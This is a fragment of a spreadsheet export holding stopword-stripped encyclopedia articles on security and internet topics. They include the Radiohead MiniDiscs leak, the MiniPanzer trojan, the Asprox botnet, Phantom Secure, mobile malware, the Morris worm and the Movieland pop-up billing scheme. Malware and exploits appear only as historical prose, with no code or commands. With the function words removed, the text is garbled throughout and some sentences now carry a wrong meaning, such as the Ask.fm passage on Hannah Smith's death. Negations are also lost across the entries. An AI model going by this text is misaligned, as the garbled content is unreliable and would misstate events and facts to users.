    <t>minidiscs [hacked] compilation recordings english alternative rock band radiohead, made working 1997 album computer. comprises hours demos, rehearsals, live performances material. recordings, taken minidiscs belonging singer thom yorke, intended release. after leaked online june 2019, radiohead released music sharing site bandcamp days, proceeds going environmentalist group extinction rebellion. compilation received positive reviews. though critics said size made daunting listeners, praised insight making computer. content minidiscs [hacked] contains hours demos, rehearsals, outtakes, live performances recorded radiohead working third album, computer (1997). includes unreleased songs, alternative mixes, early versions computer songs (such extended version "paranoid android"), versions later songs "lift", "true love waits", "nude", "last flowers", "motion picture soundtrack" "life glasshouse".the recordings taken minidiscs belonging radiohead singer thom yorke. though released 2017 computer reissue oknotok 1997 2017, intended release. release june 2019, recordings leaked online collector using name zimbra, claimed traded unreleased beatles recordings. they stolen archived material prepared computer reissue. guitarist o'brien said hacked radiohead's cloud archive.according conflicting reports, zimbra initially demanded $150,000 ransom radiohead release recordings. however, according investigation pitchfork, zimbra instead hoped sell fans. zimbra told pitchfork "the whole $150k thing 'ransom' taken context". negotiated zimbra said believe extortion intent: never told anything suggest trying money band, fans." zimbra released recordings free news broke discussion site reddit.on june, radiohead made recordings available stream purchase music distribution site bandcamp days. proceeds went environmentalist group extinction rebellion, raising approximately £500,000. official release removed 12-minute field recording non-radiohead material, several minutes james bond score. guitarist jonny greenwood wrote twitter collection "only tangentially interesting", yorke wrote bandcamp page: well bored move on." reception pitchfork wrote minidiscs [hacked] "make ideal listening experience" would interest "only diehard radiohead fans". they observed "few moments brilliance (and strangeness)", including yorke's acoustic songs, extended "paranoid android", alternative version "lift" "could topped charts".however, guardian felt minidiscs [hacked] merit "even less nerdish fans", wrote endlessly interesting chronicle band reinventing mainstream rejecting shows] inner workings regarded many greatest album 1990s, showing walked alongside turned away brash britpop surrounded them."the statesman wrote "starting, skipping scrolling" lengthy tracks "makes surprisingly liberating experience, akin wandering radiohead’s subconscious memory palace occasionally encountering familiar different form". quietus praised "stunning" live performances particularly yorke's demos, wrote "unromantic revealing" process creating music. track listing each minidisc included single track lasting approximately hour; contents broken individual tracks. fans assembled google document identify songs timestamps. references external links radiohead bandcamp (archive link june 2019) minidiscs [hacked] discogs fan-made document cataloguing compilation contents google docs</t>
  </si>
  <si>
    <t>MiniPanzer and MegaPanzer</t>
  </si>
  <si>
    <t>minipanzer megapanzer variants bundestrojaner (german federal trojan horse) written solutions swiss federal government contractor) software engineer ruben unteregger, later used switzerland's federal department environment, transport, energy communications (uvek) intercept skype generally voice traffic windows systems.the source code program released general public license version (gplv3) 2009 author, retained copyright. thereafter, trojan apparently detected wild. designations given anti-virus companies trojan.peskyspy.the malware used injection. references further reading bundestrojaner: programmer speaks interview author gulli.com external links minipanzer sourceforge, source code megapanzer sourceforge source code</t>
  </si>
  <si>
    <t>Asprox botnet</t>
  </si>
  <si>
    <t>asprox botnet (discovered around 2008), also known aliases badsrc aseljo, botnet mostly involved phishing scams performing injections websites order spread malware. highly infectious malware spreads email clone website. used trace kind personal financial information activities online. operations since discovery 2008 asprox botnet involved multiple high-profile attacks various websites order spread malware. botnet consists roughly 15,000 infected computers may, 2008, although size botnet highly variable controllers botnet known deliberately shrink (and later regrow) botnet order prevent aggressive countermeasures community.the botnet propagates somewhat unusual way, actively searches infects vulnerable websites running active server pages. once finds potential target botnet performs injection website, inserting iframe redirects user visiting site site hosting malware.the botnet usually attacks waves goal wave infect many websites possible, thus achieving highest possible spread rate. once wave completed botnet dormant extended amount time, likely prevent aggressive counterreactions security community. initial wave took place july, 2008, infected estimated 1,000 2,000 pages. additional wave took place october 2009, infecting unknown number websites. another wave took place june 2010, increasing estimated total number infected domains 2,000 estimated 10,000 13,000 within day. notable high-profile infections while infection targets asprox botnet randomly determined google searches, high-profile websites infected past. some infections received individual coverage. sony playstation u.s. adobe's serious magic website several government, healthcare business related websites also botnet malware email spam cybercrime internet security references</t>
  </si>
  <si>
    <t>Phantom Secure</t>
  </si>
  <si>
    <t>phantom secure canadian company provided modified secure mobile phones, equipped remotely operated kill switch. after shutdown, criminal users fled alternatives including anom, turned honeypot fbi. arrest vincent ramos vincent ramos arrested over easy restaurant bellingham, washington march 2018. time lived richmond, british columbia. ramos turned state's witness june. handed login details systems, giving authorities access whole operation. ramos know real identities many clients police worked uncover them. convictions said provided "secure communications high-level drug traffickers criminal organization leaders" according 2018 takedown announcement. ceo, vincent ramos, sentenced 2019 nine-year prison sentence telling undercover agents created device help drug traffickers. customers included members sinaloa cartel, reportedly asked ramos plant backdoor phantom secure's encrypted network, refused cameron ortis september 2019 rcmp arrested charged leaking information foreign entities. cameron ortis director general national intelligence coordination centre, branch rcmp specialised analytics. running nicc since 2016 joined rcmp 2007 academic background technology crime. completed university british columbia subsequently hired strategic analyst.in 2018 joint operation rcmp indicated might mole, investigation arrest ortis. media reports linked arrest phantom secure.he faces five charges security information criminal code.charges include 2015 supplied "special operational information" "v.r", believed vincent ramos. also encrochat references</t>
  </si>
  <si>
    <t>2021 FBI email hack</t>
  </si>
  <si>
    <t>november 2021, hacker compromised fbi's external email system, sending thousands spam emails warning fake cyberattack cybersecurity researcher night lion security shadowbyte vinny troia, falsely labeled emails part dark overlord hacking group united states department homeland security. emails sent addresses taken american registry internet numbers database reported hacker used fbi's public-facing email system made emails appear legitimate. campaign likely done attempt defame troia. hacker "pompompurin" later claimed responsibility hack. responses stated remediated software vulnerablilty caused attack. they told people ignore email "confirmed integrity" fbi's computer systems following attack. pompompurin hacker pompompurin claimed responsibility attack claiming interview krebs security. later interview propublica pompompurin later claimed hack done "fun." vinny troia blog post, vinny troia claimed pompompurin alias belonged canadian hacker chris meunier. interview propublica, pompompurin denied meunier. references</t>
  </si>
  <si>
    <t>Minileaks</t>
  </si>
  <si>
    <t>minileaks non-profit organization whose promote freedom speech civil justice spain. inspired ideals 2011 spanish protests 15-m movement, project founded 2010 journalists eduardo laporte iñigo antolín garnered significant attention spanish latin american mediathe collective's chief modus operandi publicize cases corporate government wrongdoing individuals, using documentary evidence obtained victim verify reports. cases submitted anonymously email post. project indeterminate hiatus since spring 2013, although maintains active social media presence. also wikileaks references further reading spanish) nace minileaks, 'made spain' filtraciones asuntos sociales noticias, última hora, vídeos fotos asuntos sociales lainformacion.com spanish) muro grandes valores blogs lanacion.com spanish) bicing discrimina ciudadanos unión europea barcelona spanish) wikileaks versión española. sur.es external links official website spanish) asuntos propios primera hora ivoox</t>
  </si>
  <si>
    <t>Ask.fm</t>
  </si>
  <si>
    <t>should confused ask.com ask.ru. askfm (ask.fm january 2016) question answer network launched june 2010 competitor formspring. after registration, user fills profile questions (anonymously openly), reply profile, create photo polls. also 2021, users communicate anonymously openly public chats tête-à-tête private chats. site founded 2010 riga, latvia. headquarters moved dublin, ireland following 2014 acquisition (who also ask.com). 2016, sold noosphere ventures, california-based asset management firm. history site founded latvia brothers ilja (iļja) mark terebin (marks terebins), oskars liepiņš, valērijs višņakovs klāvs sinka, launched june 2010, rival formspring. 2013, askfm reached million registered users continued growth approx. 300,000 users per-day. february 2015, number registered users grown million. over million questions answers created every day. 2016 sold noosphere, california-based asset management firm also owns several online gambling services, cybersecurity provider.the year, askfm major rebranding, changed logo, made several interface improvements. also, users change color interface background picture.in 2017, askfm reached million registered users remained largest network world. 2017, introduced three features photo polls, shoutouts, discover. photo polls allow voting photos post. shoutout question asked random askfm users location. discover separate feed interesting answers country (closed 2021).in 2018, askfm created in-app currency coins separate versus feed photo polls. also 2019, users opportunity coins within application. 2019, team released leaderboards, feature showing active users platform tipping, allows rewarding users' answers coins. 2019, became known launch goods market, store users purchase discounts coupons askfm coins. also, became known number registered users platform reached million.in 2019, launched program reward active users. members program access exclusive features app: creating secret answers, personal progress shows weekly statistics app. 2021, private chats added functions. 2020 program already joined 147,500 askers countries. special motivation system askers earn million coins, algorithms promoted vip-profiles users million followers 890,5 million likes. besides, askers russia, germany, italy chance convert coins earned real money. first year alone managed earn 4000 dollars answering questions like before.since 2020, registration required view profiles. 2020, peak pandemic covid-19, million users latin america returned askfm. march 2020, twitter mexico overflowing tweets people remembered social network childhood started massively installing askfm. day, application reached place store less hours place google play hours mexico. during period, askfm received 210,000 requests restore profiles, support service worked hours day.in 2020, askfm subscription launched (and 2021 android users). subscription package includes badge, bonus coins, secret answer feature, ability without ads.in 2021, private chats appeared askfm, users chat tête-à-tête. author private chat remain anonymous entire dialogue write chat openly time. assistance investigation cyberbullying august 2013, reported hannah smith, 14-year-old girl leicestershire, england, killed father blamed death cyberbullying responses received site. called tighter controls social networking sites like askfm, saying seen abuse daughter received wrong anonymous.askfm took responsible approach investigation conducted internal audit. investigation showed sufficient evidence suggest using askfm site death young girl. fact, wayne simmons revealed hannah sending 'bullying aggressive messaging' herself. later hannah smith's case self-bullying became subject academic research.as result, askfm made changes safety policies accordingly. above all, enhanced reporting blocking functionalities, hired moderation staff review reports within hours upon receiving them. askfm also encouraged users registered accounts, company could capture data safety purposes. august 2014, site purchased iac. askfm since reconsidered user safety policies launched safety advisory board consisting experts digital safety,[23][24] well safety center. askfm officials department children assure proper steps taken "significantly improve" protections website."safety number priority right now."in 2017, askfm also partnered koko, company provide powered service detecting damaging content. partnership aims address phenomenon "self-bullying" detecting cases providing personalized distress-support.in 2018, askfm teamed charity diana award linda papadopoulos research online life affects young people build identity. findings allowed create pack educative materials young people, parents teachers. assistance combating terrorism 2014, news documented askfm used isis recruiting advice. askfm spokesperson said company allow calls violence criminal activity. isis accounts remained active week reported.the company subsequently joined european commission's internet forum 2015 curb spread terrorist content implementing joint industry hash database initiative detect illegal terrorist content also joined tech against terror initiative.in 2021, annual transparency report, askfm reported helped prevent cases priority threats enforcement. extremism cases. reception askfm cited example problems anonymous social media cause combination offline contacts know well, availability online anonymity. since 2014, company constantly improving service prevent bullying. also social media formspring references external links official website</t>
  </si>
  <si>
    <t>Ashley Madison data breach</t>
  </si>
  <si>
    <t>Mint (web analytics software)</t>
  </si>
  <si>
    <t>mint deprecated server-based analytics tool. tracks traffic trends, http referrers, search trends.the developer shaun inman discontinued sales support december 2016. also analytics list analytics software references external links official website personal site shaun inman, designer/developer mint</t>
  </si>
  <si>
    <t>360 Safeguard</t>
  </si>
  <si>
    <t>safeguard (chinese: 360安全卫士) total security program developed qihoo 360, internet security company based china. safeguard's focus stopping malware computer viruses trojan horses, providing security patches microsoft windows. safeguard trojan horse scanner cloud-based. heuristics engine built scanner. safeguard uses avira engine addition engines, total security kunpeng engine, made qihoo. dispute tencent 2010, safeguard analyzed protocol accused automatically scanning users' computers uploading personal information qq's servers without users' consent. response, tencent called malware denied users installed access services. chinese ministry industry information reprimanded companies "improper competition" ordered come accord. dispute testing bodies april 2015 three independent security testing bodies av-comparatives, av-test virus bulletin published joint press release criticizing qihoo found qihoo submitted products comparative behaved significantly different user products. products comparative used engine bitdefender, user products qihoo 360's engine instead. testing bodies claimed user products would provide considerably lower level protection higher likelihood false positives. consequence three testing bodies revoked certifications rankings earlier year.qihoo denied cheating allegations claiming engine developed qihoo would effective china. also secure browser comparison antivirus software internet security list antivirus software references external links total security (global version) official website english) safeguard (360安全卫士) official website chinese)</t>
  </si>
  <si>
    <t>3DM</t>
  </si>
  <si>
    <t>chinese video game piracy group group individuals specialized cracking digital rights management (drm) applied commercial video games. "one world's biggest" groups around 2016, according kotaku.their founder leader reported woman using pseudonym "不死鸟" (pinyin: niǎo; lit. 'phoenix'). unusual piracy groups, 3dm's members public profiles social network sina weibo, blog inform public activities. history made gaming media headlines january 2016 (phoenix) wrote anticipated years cracked games would available, attributing shift technology denuvo, adopted many games publishers. group also announced would quit cracking games year, later claimed defeated denuvo's technology.in 2017, japanese game developer koei tecmo lawsuit chinese court. sentenced $245,000 u.s. dollars damages, cease distribution pirated versions koei tecmo's games. references external links official website chinese)</t>
  </si>
  <si>
    <t>Archive.today</t>
  </si>
  <si>
    <t>archive.today archive.is) archiving site, founded 2012, saves snapshots demand, support javascript-heavy sites google maps progressive applications twitter. archive.today records snapshots: replicates original webpage including functional live links; screenshot page. features functionality archive.today capture individual pages response explicit user requests. since beginning, archive.today supported crawling pages urls containing now-deprecated hash-bang fragment (#!).archive.today records text images, excluding xml, rtf, spreadsheet (xls ods) non-static content. however, videos certain sites, like twitter, saved. keeps track history snapshots saved, requesting confirmation adding snapshot already saved page.pages captured browser width 1,024 pixels. converted inline css, removing responsive design selectors :hover :active. content generated using javascript crawling process appears frozen state.html class names preserved inside old-class attribute. when text selected, javascript applet generates fragment seen browser's automatically highlights portion text visited again. pages cannot duplicated archive.today web.archive.org second-level backup, archive.today places exclusion wayback machine save snapshots warc format. reverse—from web.archive.org archive.today—is possible, copy usually takes time direct capture. some sites deleted internet archive's listings retroactively blocked saved robots.txt file, archive.today this.the research toolbar enables advanced keywords operators, using wildcard character. couple quotation marks address search exact sequence keywords present title body webpage, whereas insite operator restricts specific internet domain.once page archived, cannot deleted directly internet user. removing advertisements, popups expanding links archived pages possible asking owner blog.while saving dynamic list, archive.today searchbox shows result links previous following section list (e.g. links page). pages saved filtered, sometimes found occurrences.the search feature backed google customsearch. delivers results, archive.today attempts utilize yandex search.while saving page, list urls individual page elements content sizes, http statuses mime types shown. this list viewed crawling process. download archived pages file, except pages archived since november 2019, archive.today changed browser engine phantomjs chromium.since july 2013, archive.today supports memento project application programming interface (api). history archive.today founded 2012. site originally branded archive.today, 2015, changed primary mirror archive.is.in january 2019, began deprecate archive.is domain favor archive.today mirror. worldwide availability australia march 2019, site blocked months several australian internet providers aftermath christchurch mosque shootings attempt limit distribution footage attack. since unblocked. china according greatfire.org, archive.today blocked china since march 2016, archive.li since september 2017, archive.fo since july 2018, well archive.ph since december 2019. finland july 2015, operators blocked access service finnish addresses, stating twitter order avoid escalating dispute allegedly finnish government. since unblocked. russia russia, http access possible; https connections blocked. cloudflare availability 2018, possible reach site using cloudflare's 1.1.1.1 service. cloudflare staff stated problem archive.today, authoritative nameservers return invalid records queried within cloudflare's network archive.today returns invalid data requests coming cloudflare's servers. archive.today's reasoning fact cloudflare send edns client subnet information requests. also references external links official website official blog</t>
  </si>
  <si>
    <t>Mobile malware</t>
  </si>
  <si>
    <t>mobile malware malicious software targets mobile phones wireless-enabled personal digital assistants (pda), causing collapse system loss leakage confidential information. wireless phones networks become common grown complexity, become increasingly difficult ensure safety security electronic attacks form viruses malware. history first known virus affected mobiles, "timofonica", originated spain identified antivirus labs russia finland june 2000. "timofonica" sent messages gsm-capable mobile phones read spanish) "information you: telefónica fooling you." these messages sent internet gateway movistar mobile operator. "timofonica" mobile devices true mobile malwarein june 2004, discovered company called ojam engineered anti-piracy trojan hack older versions mobile phone game, mosquito. this sent texts company without user's knowledge. july 2004, computer hobbyists released proof-of-concept virus cabir, infects mobile phones running symbian operating system, spreading bluetooth wireless. this first true mobile malwarein march 2005, reported computer worm called commwarrior-a infecting symbian series mobile phones. this specific worm replicated phone's multimedia messaging service (mms), sending copies contacts listed phone user's address book. august 2010, kaspersky reported trojan trojan-sms.androidos.fakeplayer.a. this first malware affected google's android operating system, sent messages premium rate numbers without owner's knowledge, accumulating huge bills.currently, various antivirus software companies offer mobile antivirus software programs. meanwhile, operating system developers curb spread infections quality control checks software content offered digital application distribution platforms, google play apple's store. recent studies however show mobile antivirus programs ineffective rapid evolution mobile malware. taxonomy many types common malicious programs known affect mobile devices: expander: expanders target mobile meters additional phone billing profit worm: main objective stand-alone type malware endlessly reproduce spread devices. worms also contain harmful misleading instructions. mobile worms transmitted text messages typically require user interaction execution. trojan: unlike worms, trojan horse always requires user interaction activated. this kind virus usually inserted seemingly attractive non-malicious executable files applications downloaded device executed user. once activated, malware cause serious damage infecting deactivating applications phone itself, rendering paralyzed certain period time certain number operations. usurpation data (spyware) synchronizes calendars, email accounts, notes, source information sent remote server. spyware: this malware poses threat mobile devices collecting, using, spreading user's personal sensitive information without user's consent knowledge. mostly classified four categories: system monitors, trojans, adware, tracking cookies. backdoor: covert method bypassing security restrictions gain unauthorized access computer system. simpler words, backdoor piece code allows others system without detected. dropper: malware designed install programs device, unbeknownst user. these could include malicious programs benign applications attacker interested spreading (often financial gain [malvertising] campaign). notable mobile malicious programs autolycos: this latest malware family discovered subscribes users without knowledge premium services. autolycos identified july 2022 malware experts cybersecurity firm evina. joker malware: this malware infects mobile phones running android first identified june 2017. when phone infected, usually information stolen malware makers. users reported unwanted online subscriptions malware created steal otp, make online transactions, etc. cabir: this malware infects mobile phones running symbian first identified june 2004. when phone infected, message 'caribe' displayed phone's screen displayed every time phone turned worm attempts spread phones area using wireless bluetooth signals, although recipient confirm manually. duts: this parasitic file infector virus first known virus pocket platform. attempts infect files larger 4096 bytes current directory. skulls: trojan horse piece code targets mainly symbian once downloaded, virus replaces phone desktop icons images skull. also renders phone applications useless. this malware also tends mass text messages containing malicious links contacts accessible device order spread damage. this mass texting also give rise high expenses. commwarrior: this malware identified 2005. first worm messages spread bluetooth well. infects devices running symbian series executable worm file, launched, hunts accessible bluetooth devices sends infected files random name various devices. flexispy: stalkerware software first developed 2006. initially designed symbian classified malware anti-virus vendor 2007. available android ios. used track locations, read whatsapp messages, listen ambient conversations, intercept phone calls abilities. hatihati: worm-like software symbian devices, first identified 2007. hatihati pirated copy beta version anti-theft software symbian called guardian. number flaws meant acted like worm copying memory card inserted mobile, mobile device application sent many alert given numbers. volumes total mobile operator middle east could attributed malware. zitmo: this malware identified 2010. abbreviation zeus-in-the-mobile, trojan suggested installation mobile phone zeus-infected computer, redirects incoming smss acting like man-in-the-mobile. first mobile malware designed steal mtan banking codes. originally detected symbian, identified windows mobile, blackberry android. gingermaster: trojan developed android platform propagates installing applications incorporate hidden malware installation background. exploits frailty version gingerbread (2.3) operating system super-user permissions privileged escalation. creates service steals information infected terminals (user number sim, phone number, imei, imsi, screen resolution local time) sending remote server petitions http. droidkungfu: trojan content android applications, executed, obtains root privileges installs file com.google. ssearch.apk, contains back door allows files removed, open home pages supplied, 'open download install' application packages. this virus collects sends remote server available data terminal. ikee: first worm known platforms, identified 2009. works terminals previously made process jailbreak, spreads trying access devices using protocol, first subnet connected device. then, repeats process generating random range finally uses preset ranges corresponding address certain telephone companies. once computer infected, wallpaper replaced photograph singer rick astley, reference rickroll phenomenon. samsapo: first worm known android platforms, identified april 2014. worm targeted mostly russian android users. once device infected malware could like spyware, well actions like download additional malicious files, send smss premium rate numbers block phone calls. gunpoder: this worm file infector virus first known virus officially infected google play store countries, including brazil. shedun: adware serving malware able root android devices. hummingbad: infected million android operating systems 2016. user details sold adverts tapped without user's knowledge thereby generating fraudulent advertising revenue. pegasus: this spyware identified august 2016. exploited three previously undisclosed vulnerabilities ios, combined allowed remote jailbreak device, something seen devices wild. once installed, spyware capable many features including logging encrypted messages, activating phone microphone secretly tracking phone movements. first identified platforms, later identified android devices. also joker malware wikipedia computer virus file binder individual mobility malware dendroid (malware) trojan horse (computing) worm (computing) mobile operating system references</t>
  </si>
  <si>
    <t>Morris worm</t>
  </si>
  <si>
    <t>morris worm internet worm november 1988, oldest computer worms distributed internet, first gain significant mainstream media attention. also resulted first felony conviction 1986 computer fraud abuse act. written graduate student cornell university, robert tappan morris, launched november 1988, computer systems massachusetts institute technology. architecture worm created morris simply could done, released massachusetts institute technology (mit) hope suggesting creator studied there, instead cornell. (morris became tenured professor 2006.) worm's creator robert tappan morris cryptographer robert morris, worked time.the worm exploited several vulnerabilities gain entry targeted systems, including: hole debug mode unix sendmail program buffer overflow overrun hole fingerd network service transitive trust enabled people setting network logins password requirements remote execution (rexec) remote shell (rsh), termed rexec/rshthe worm also functioned exploit weak passwords. reliance (normally disabled untrusted networks), fixes sendmail, finger, widespread network filtering, improved awareness dangers weak passwords, exploits morris used would longer succeed contemporary properly configured system present day. though morris intend worm actively destructive, instead seeking merely highlight weaknesses present many networks time, unintentional consequence morris's coding resulted worm damaging easily spread originally planned. while initially programmed check computer determine infection already present, morris believed system administrators might counter instructing computer report false positive. instead programmed worm copy time, regardless status infection computer. this resulted computer potentially infected multiple times, additional infection slowing machine eventual point unusable. this would effect fork bomb, crash computer several times. main body worm could infect machines running 4bsd, alongside sun-3 systems. portable "grappling hook" component worm used pull (download) main body parts, grappling hook could systems, loading making peripheral victims. coding mistake resulting issues morris's coding mistake, instructing worm replicate regardless computer's reported infection status, transformed worm potentially harmless intellectual computing exercise viral denial service attack. morris's inclusion rate copy within worm inspired michael rabin's mantra "randomization."the resulting level replication proved excessive, worm spreading rapidly, infecting computers number times. rabin would eventually comment morris "should tried simulator first." effects worm u.s. government accountability office cost damage $100,000–$10,000,000. clifford stoll, systems administrator known discovering subsequently tracking hacker markus hess three years earlier, helped fight worm, writing 1989 that, surveyed network, found thousand computers infected within fifteen hours. these machines dead water—useless disinfected. removing virus often took days." stoll commented worm showed danger monoculture, systems arpanet berkeley unix, virus would disabled fifty thousand them."it usually reported around 6,000 major unix machines infected morris worm; however, morris's colleague paul graham claimed, statistic cooked recipe: someone guessed 60,000 computers attached internet, worm might infected percent them." stoll estimated "only couple thousand" computers affected, writing "rumors [morris] worked friend harvard's computing department (harvard student paul graham sent mail asking 'any news brilliant project')."the internet partitioned several days, regional networks disconnected nsfnet backbone prevent recontamination whilst cleaning networks. morris worm prompted darpa fund establishment cert/cc carnegie mellon university, giving experts central point coordinating responses network emergencies. gene spafford also created phage mailing list coordinate response emergency. morris tried convicted violating united states code: title u.s.c. 1030), computer fraud abuse united states morris. after appeals, sentenced three years' probation, hours community service, fine $10,050 plus costs supervision. total fine $13,326, included $10,000 fine, special assessment, $3,276 cost probation oversight. morris worm sometimes referred "great worm," devastating effect internet time, overall system downtime psychological impact perception security reliability internet. name derived "great worms" tolkien: scatha glaurung. popular culture 1995 film hackers features main character releases viral attack bearing several similarities morris worm: event takes place 1988, infects thousand computers, causes massive economic disruption, results propagator fined probation. visual novel digital: love story, morris worm portrayed cover story large-scale attack arpanet several bulletin board systems. epilogue book cuckoo's egg, stoll details efforts battling morris worm. halt catch fire, virus works similar morris worm created gauge size network. webcomic internet explorer, named browser, morris worm portrayed female character. also buffer overflow timeline computer viruses worms explanatory notes references external links cornell commission findings (from abstract: "sheds light dispels myths") archive worm material, including papers code 1135 "helminthiasis internet" analysis worm infestation report internet worm, page, university lowell tour worm" donn seeley, department computer science university utah this paper provides chronology outbreak presents detailed description internals worm, based version produced decompiling. "with microscope tweezers: analysis internet virus november 1988" mark eichin rochlis, massachusetts institute technology present chronology events seen team mit... nasa incident report morris worm infection supercomputer "vexing virus" newshour segment</t>
  </si>
  <si>
    <t>Movieland</t>
  </si>
  <si>
    <t>movieland, also known movieland.com, moviepass.tv popcorn.net, subscription-based movie download service subject thousands complaints federal trade commission, washington state attorney general's office, better business bureau, agencies consumers said held hostage repeated pop-up windows demands payment, triggered free 3-day trial period. many said never even heard movieland first pop-up. movieland advertised service spyware", personal information would need filled begin free trial.the federal trade commission (ftc) filed complaint movieland eleven defendants august 2006, charging "engaged nationwide scheme deception coercion extract payments consumers." attorney general state washington also filed complaint, charging movieland several defendants violating state's computer spyware consumer protection act. overview movieland advertises movie download service using pop-up sites. offer three-day free trial, access members-only content including music, news, updated sports scores adult movies. forms fill out, need provide credit card number e-mail address, making trial appear anonymous. site's homepage states spyware", "virus free", extra charge". site installs program, mediapipe, used access service. early consumer complaints movieland.com began operations sometime fall 2005 earlier. consumer complaints began soon thereafter. most consumers claimed never signed free trial, never used service, never even heard movieland first pop-up demand payment. some said found software computers downloading screensaver free utility. company denied installed software stealthy means.media coverage early january 2006 recounted consumer complaints mentioned several anti-spyware companies buying google advertisements boasting product's ability "remove movieland now". report updated february 2008, berkman center internet society harvard school calls movieland's mediapipe component "badware" fully disclose installing, completely remove components 'obligations' uninstall process, modifies software without disclosure." richard stiennon it-harvest referred movieland form "ransomware" behaviour. july 2008, mediapipe report still cited berkman center internet society harvard school. complaints august 2006, filed complaint united states district court obtain preliminary permanent injunctive relief, rescission contracts, restitution, disgorgement equitable relief defendants' deceptive unfair acts practices violation section 5(a) act".the complaint alleged defendants demanding payment problem created, installing disruptive software could removed reasonable means. according complaint, movieland repeatedly bombarded consumers pop-up windows, accompanied music lasted nearly minute. they demanded minimum payment $29.95 recurring pop-up cycle, claiming consumers signed three-day free trial cancel service trial period over.the complaint charged that: installation defendants' download manager merely smoke screen concealing defendants' true purpose: install software files onto consumers' computers enable defendants launch pop-up windows consumers computers demanding payments defendants. these pop-up windows, display textual audiovisual payment demands, significantly disrupt consumers' computers. after defendants cause pop-up payment demands display particular computer first time, cause redisplay ever-increasing frequency." pop-ups large dark background took much screen, blocking access windows, contain close minimize buttons; forcing user continue. first pop-up showed date time "our content access software installed system free trial began", text "click 'continue' purchase license stop reminders", graphic reading "stop these reminders now" "click continue". option offered button labeled "continue".clicking "continue" brought next pop-up, 40-second audiovisual clip featuring woman introduced "your personal customer service representative" stated "because cancel trial period, legally obligated make payment terms conditions agreed installed content delivery software." clip neared conclusion, dialog entitled "payment options" appeared. choosing "close window" option ended pop-ups unvarying cycle began again.in addition, complaint alleged defendants made numerous false statements attempting collect payments consumers, claiming computer owner someone else consented receiving pop-up payment demands paid, owner computer received pop-ups legally obligated movieland, computer owner obligated satisfy contract person entered using computer. customer service telephone number provided number. when consumers called recorded greeting told would incur $34.95 charge hang within three seconds.the complaint also alleged defendants made difficult impossible consumers uninstall software. those attempting remove windows control panel "add remove programs" function redirected page telling $29.95 stop pop-ups. many consumers could regain control computers fee, computer technician remove software. movieland's position movieland representatives said downloads spyware computers accidentally, insisting "drive-by downloads". they said lawsuit "improperly brought", pointed time complaint filed federal judge rejected ftc's request temporary restraining order would immediately ended cited billing practices.the terms service movieland site warned users cancel three-day period, pop-up billing reminders would begin "will appear frequently choose payment options license."movieland said pop-ups anti-fraud mechanism" cannot received without consumers intentionally downloading software several intentional steps, default setting "cancel". company also stated "there extrinsic programs (adware otherwise) bundled software." company disputed claim software "very difficult of", said could removed using windows control panel. defendants following companies individuals named defendants complaint: digital enterprises, inc. d/b/a movieland.com triumphant videos, inc. d/b/a popcorn.net pacificon international, inc. d/b/a vitalix alchemy communications, inc. accessmedia networks, inc. innovative networks, inc. film web, inc. binary source, inc. d/b/a moviepass.tv mediacaster, inc. d/b/a mediacaster.net hotline, inc. easton herd, sole officer director digital enterprises triumphant videos andrew garroni, officer director pacificon, alchemy, film web, binary source pre-trial stipulations november 2006, defendants signed stipulations governing pre-trial conduct. without admitting wrongdoing, violation law, involvement acts practices alleged complaint, defendants agreed make clear prominent disclosures prior software download installation, download install software without user's explicit consent without disclosing clearly prominently site's terms service nature, frequency, duration pop-up windows appear regarding purported obligation payment. pop-ups also must lock access rest computer.they also agreed fixed limits many pop-ups generate computer (maximum day, hour), requirement provide mute button sound content pop-ups able close windows, provide hyperlink toll-free number email utility, request stopping pop-ups certain conditions. defendants also promised clearly label single-click download install buttons, pre-select default.they also required represent consumers "legal" "contractual" obligation software unless computer owner provided personal identification agreed pay, failure result collection proceedings affect computer owner's credit status unless owner provided personal identification credit card agreed pay. customer service agents state "believe" computer owner responsible paying download, offer several purchase options including one-time 30-day non-renewing license $29.95, access service terminate. settlement complaint scheduled tried united states district court january 2008, trial, defendants chose settle court ftc.movieland settled september 2007. without admitting wrongdoing violation law, defendants agreed make permanent terms pre-trial stipulations including limiting number, frequency duration billing pop-ups; $501,367 reimburse consumers paid program result repeated pop-up demands. defendants also agreed stop offering anonymous free trials, users certify install time least years age, provide install-time link terms service user license agreement, download software reinstalls user removed prominently post removal instructions sites.the agreement also requires herd garroni notify change name, address employment status, business affiliations, five years. complaints state washington august 2006, mckenna, attorney general state washington charged movieland, digital enterprises, herd, garroni violating state's computer spyware consumer protection act. complaint, filed king county superior court seattle, alleged misrepresentations unlawful business acts practices similar alleged complaint, alleged violations washington state law.the defendants subject fines $100,000 violation spyware $2,000 violation consumer protection found liable. they also subject paying restitution affected consumers. alleged violations alleged violations washington state included taking control user's computer violation spyware consumer protection (cpa), remotely installing billing software initiates controls pop-up cycle, misrepresenting ability uninstall software violation acts, listing software add/remove programs although software cannot uninstalled, unconscionable business practices violation cpa, "aggressive harassing" billing method used failure disclose including billing method "that forces payment completely obstructing users' access computers", threats, harassment intimidation billing practices violation cpa, threatening collection proceedings adverse effect users' credit records, fact defendants even know consumer's name; referring consumers' "legal obligation" pay, fact legally binding contract, failure disclose material facts violation cpa, "aggressive, relentless, threatening" form payment demands; fact uninstallation option software disabled; defendants "transmit software user's computer surreptitiously", misrepresentations violation cpa, including stating software contains spyware" fact software constitutes spyware behavior.in announcing suit following seven-month investigation, washington attorney general mckenna rejected possible defense. "the defendants' claim users legally obligated service lacks merit consumers provide knowing consent installation relentless pop-up demands", said. "furthermore, computer owners responsible satisfy contracts people, including minors, entered using computer." also said defendants' threats collection proceedings adverse effects users' credit ratings empty, defendants personally identify computer users.assistant attorney general paula selis said tactics forced consumers give $100 service. said, sued getting complaints consumers felt harassed held barrel payments agree make." selis said, harassment, intimidation consumer. using high-pressure tactic make something legally obligated pay." settlement movieland settled washington april 2007 terms similar settlement specific washington consumers, agreeing washington $50,000 consumer reimbursement prominently state important contract terms, including cost subscription service, advertisements. also micro bill systems platte media, similar business operated references</t>
  </si>
  <si>
    <t>Mozilla Foundation</t>
  </si>
  <si>
